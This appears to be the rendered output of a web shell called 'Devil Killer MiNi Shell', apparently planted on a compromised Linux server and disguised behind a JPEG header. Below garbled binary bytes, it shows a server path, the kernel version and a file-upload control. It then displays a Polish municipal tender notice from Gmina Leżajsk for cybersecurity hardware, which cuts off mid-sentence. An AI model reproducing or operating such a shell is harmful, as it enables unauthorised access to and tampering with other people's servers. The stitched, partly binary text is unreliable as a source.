JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20250731/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20250731/0035551401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa, wdrożenie oraz utrzymanie zintegrowanego systemu zapewniającego bezpieczeństwo informacji dla Gminy Leżajsk w ramach projektu: Poprawa poziomu Cyberbezpieczeństwa w Gminie Leżajsk </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA LEŻAJSK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690581732</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Łukasza Opalińskiego 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Leżajsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@poczta.gminalezajsk.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://samorzad.gov.pl/web/gmina-lezajsk</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa, wdrożenie oraz utrzymanie zintegrowanego systemu zapewniającego bezpieczeństwo informacji dla Gminy Leżajsk w ramach projektu: Poprawa poziomu Cyberbezpieczeństwa w Gminie Leżajsk </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-dcb64d7e-340a-447b-9772-7d6a7af1f255</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00355514</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00038395/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Zakup sprzętu i oprogramowania w ramach projektu &#34;Cyberbezpieczny samorząd&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Program Fundusze Europejskie na Rozwój Cyfrowy (FERC) Priorytet II Zaawansowane usługi cyfrowe Działanie 2.2. Wzmocnienie krajowego systemu cyberbezpieczeństwa Fundusz Europejski Fundusz Rozwoju Regionalnego (EFRR) Numer naboru FERC.02.02-CS.01-001/23 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-dcb64d7e-340a-447b-9772-7d6a7af1f255 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem<br/>https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl oraz poczty elektronicznej (zamowieniapubliczne@poczta.gminalezajsk.pl) <br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne. <br/>3.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”. <br/>4.	Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania. <br/>5.	Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych. <br/>6.	Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny). <br/>7.	Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia. oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia. <br/>8. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”. <br/>9.	Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia. <br/>10.	W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (32) 77 88 999 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”. <br/>11.	W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: zamowieniapubliczne@poczta.gminalezajsk.pl (nie dotyczy składania ofert/wniosków o dopuszczenie do udziału w postępowaniu). <br/>12 Szczegółowe informacje opisane zostały w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający realizuje obowiązek informacyjny w dokumentach zamówienia (rozdz. XXXII SWZ)</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający realizuje obowiązek informacyjny w dokumentach zamówienia (rozdz. XXXII SWZ)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.13.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa, wdrożenie oraz utrzymanie zintegrowanego systemu zapewniającego bezpieczeństwo informacji dla Gminy Leżajsk. Zakres zamówienia obejmuje dostawę infrastruktury sprzętowej, rozwiązań informatycznych oraz usługi instalacji, konfiguracji, wsparcia i doradztwa eksperckiego na etapie realizacji zamówienia.<br/>Szczegółowe określenie opisu przedmiotu zamówienia zostało przedstawione w załączniku nr 3 do niniejszej SWZ, w którym zawarto opisy przedmiotu zamówienia dla każdego z zadań. <br/>Zadanie nr 1 - Zakup serwerów, macierzy dyskowej i przełącznika zarządzalnego<br/>Zadanie obejmuje dostawę dwóch serwerów dwuprocesorowych klasy enterprise, macierzy dyskowej o wysokiej dostępności oraz zarządzalnego przełącznika sieciowego L3. Celem zadania jest zapewnienie wydajnego, bezpiecznego i skalowalnego środowiska IT z możliwością monitoringu, zaawansowanego zarządzania i pełnej redundancji sprzętowej.<br/>	Zamawiający dopuszcza stosowanie materiałów równoważnych. <br/>	Jeżeli w jakimkolwiek miejscu w dokumentacji zostały wskazane nazwy producenta, nazwy własne, znaki towarowe, patenty lub pochodzenie materiałów czy urządzeń służących do wykonania niniejszego zamówienia - wszędzie tam Zamawiający dodaje wyrazy &#34;lub równoważne&#34; i wszędzie tam Zamawiający dopuszcza stosowanie równoważnych nazw producenta, nazw własnych, znaków towarowych, patentów lub pochodzenia materiałów czy urządzeń służących do wykonania niniejszego zamówienia.<br/>	Jeżeli w jakimkolwiek miejscu w dokumentacji znajdują się odniesienia do norm europejskich, ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, wszędzie tam zamawiający dodaje do tych nazw wyrazy &#34;lub równoważne&#34; i wszędzie tam Zamawiający dopuszcza stosowanie równoważnych norm, ocen technicznych, aprobat, specyfikacji technicznych<br/>i systemów referencji technicznych.	<br/>Zamawiający zastrzega sobie prawo do oceny równoważności proponowanych materiałów lub urządzeń. Zamawiający zastrzega sobie także prawo do korzystania w tym względzie z opinii ekspertów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48820000-2 - Serwery</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30233141-1 - Nadmiarowa macierz niezależnych dysków (RAID)</p> <p class="mb-0">32420000-3 - Urządzenia sieciowe</p> <p class="mb-0">37453300-1 - Dyski</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) cena (waga 60%) - P1<br/>Kryterium – „cena” – poszczególnym ofertom zostaną przyznane punkty za cenę w skali 1-60 obliczone według wzoru wskazanego w<br/>rozdz. XXI SWZ<br/>2) Ilość pamięci operacyjnej w serwerze (waga 10%) – P2	<br/>	Kryterium „ilość pamięci operacyjnej w serwerze” będzie oceniane następująco:<br/>Kryterium będzie rozpatrywane na podstawie zaproponowanej przez Wykonawcę w ofercie ilość pamięci operacyjnej w oferowanym serwerze. <br/>Ilość pamięci operacyjnej w serwerze	Liczba przyznanych punktów <br/>za zadeklarowanie 384 GB pamięci	0 pkt <br/>Za zadeklarowanie min. 512 GB pamięci	10 pkt<br/>W tym kryterium można uzyskać maksymalnie 10 punktów. <br/><br/>3) Pojemność pamięci podręcznej (cache) macierzy )(waga 10%) – P3 <br/><br/>	Kryterium „Pojemność pamięci podręcznej (cache) macierzy” będzie oceniane następująco:<br/>Kryterium będzie rozpatrywane na podstawie zaproponowanej przez Wykonawcę w ofercie pojemości w oferowanej macierzy. <br/>Pojemność pamięci podręcznej (cache) macierzy Liczba przyznanych punktów <br/>32 GB	0 pkt <br/>64 GB	5 pkt<br/>96 GB	10 pkt<br/>W kryterium można uzyskać maksymalnie 10 punktów<br/><br/>4) Termin realizacji – P4	<br/><br/>Kryterium: Termin realizacji <br/>Waga 20% (20 punktów): <br/>a)	Za zaproponowanie terminu realizacji zamówienia w przedziale między 60 a 40 dni, Wykonawca otrzyma 10 pkt.<br/>b)	Za zaproponowanie terminu realizacji zamówienia poniżej 40 dni, Wykonawca otrzyma 20 pkt.<br/>Przez termin realizacji zamówienia należy rozumieć termin wykonania całego zamówienia. Bieg terminu rozpoczyna się na dzień następujący po dniu zawarcia umowy.<br/>Zaoferowany termin realizacji zamówienia nie może być dłuższy niż 60 dni kalendarzowych. W przypadku zaoferowania terminu dłuższego niż 60 dni oferta Wykonawcy zostanie odrzucona!<br/>Termin realizacji należy podać w pełnych dniach!</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ilość pamięci operacyjnej w serwerze</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Pojemność pamięci podręcznej (cache) macierzy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa, wdrożenie oraz utrzymanie zintegrowanego systemu zapewniającego bezpieczeństwo informacji dla Gminy Leżajsk. Zakres zamówienia obejmuje dostawę infrastruktury sprzętowej, rozwiązań informatycznych oraz usługi instalacji, konfiguracji, wsparcia i doradztwa eksperckiego na etapie realizacji zamówienia.<br/>Szczegółowe określenie opisu przedmiotu zamówienia zostało przedstawione w załączniku nr 3 do niniejszej SWZ, w którym zawarto opisy przedmiotu zamówienia dla każdego z zadań. <br/>Zadanie nr 2 – Zakup serwera NAS<br/>Zadanie obejmuje dostawę serwera NAS klasy rack wyposażonego w 12 kieszeni na dyski, z możliwością rozbudowy do 36, obsługującego nowoczesne systemy plików, wirtualizację oraz pracę w klastrze wysokiej dostępności. Urządzenie zapewnić ma ochronę danych, synchronizacji i tworzenia kopii zapasowych w środowiskach heterogenicznych oraz posiada rozbudowane możliwości zarządzania i rozbudowy.<br/><br/>	Zamawiający dopuszcza stosowanie materiałów równoważnych. <br/>	Jeżeli w jakimkolwiek miejscu w dokumentacji zostały wskazane nazwy producenta, nazwy własne, znaki towarowe, patenty lub pochodzenie materiałów czy urządzeń służących do wykonania niniejszego zamówienia - wszędzie tam Zamawiający dodaje wyrazy &#34;lub równoważne&#34; i wszędzie tam Zamawiający dopuszcza stosowanie równoważnych nazw producenta, nazw własnych, znaków towarowych, patentów lub pochodzenia materiałów czy urządzeń służących do wykonania niniejszego zamówienia.<br/>	Jeżeli w jakimkolwiek miejscu w dokumentacji znajdują się odniesienia do norm europejskich, ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, wszędzie tam zamawiający dodaje do tych nazw wyrazy &#34;lub równoważne&#34; i wszędzie tam Zamawiający dopuszcza stosowanie równoważnych norm, ocen technicznych, aprobat, specyfikacji technicznych<br/>i systemów referencji technicznych.	<br/>Zamawiający zastrzega sobie prawo do oceny równoważności proponowanych materiałów lub urządzeń. Zamawiający zastrzega sobie także prawo do korzystania w tym względzie z opinii ekspertów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48820000-2 - Serwery</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37453300-1 - Dyski</p> <p class="mb-0">32420000-3 - Urządzenia sieciowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) cena (waga 60%) - P1<br/>Kryterium – „cena” – poszczególnym ofertom zostaną przyznane punkty za cenę w skali 1-60 obliczone według wzoru wskazanego w<br/>rozdz. XXI SWZ<br/>2) Termin realizacji – P4	<br/><br/>Kryterium: Termin realizacji <br/>Waga 20% (20 punktów): <br/>a)	Za zaproponowanie terminu realizacji zamówienia w przedziale między 60 a 40 dni, Wykonawca otrzyma 10 pkt.<br/>b)	Za zaproponowanie terminu realizacji zamówienia poniżej 40 dni, Wykonawca otrzyma 20 pkt.<br/>Przez termin realizacji zamówienia należy rozumieć termin wykonania całego zamówienia. Bieg terminu rozpoczyna się na dzień następujący po dniu zawarcia umowy.<br/>Zaoferowany termin realizacji zamówienia nie może być dłuższy niż 60 dni kalendarzowych. W przypadku zaoferowania terminu dłuższego niż 60 dni oferta Wykonawcy zostanie odrzucona!<br/>Termin realizacji należy podać w pełnych dniach!<br/><br/>3) Kryterium: Pamięć RAM w serwerze NAS<br/>Waga: 20% (20 punktów)<br/>Kryterium będzie rozpatrywane na podstawie zaproponowanej przez Wykonawcę w ofercie ilość pamięci operacyjnej w oferowanym serwerze. <br/>Ilość pamięci operacyjnej w serwerze	Liczba przyznanych <br/>Za zadeklarowanie 8 GB pamięci	0 pkt <br/>Za zadeklarowanie min. 16 GB pamięci	10 pkt<br/>Za zadeklarowanie min. 32 GB pamięci	20 pkt</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Pamięć RAM w serwerze NAS</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek 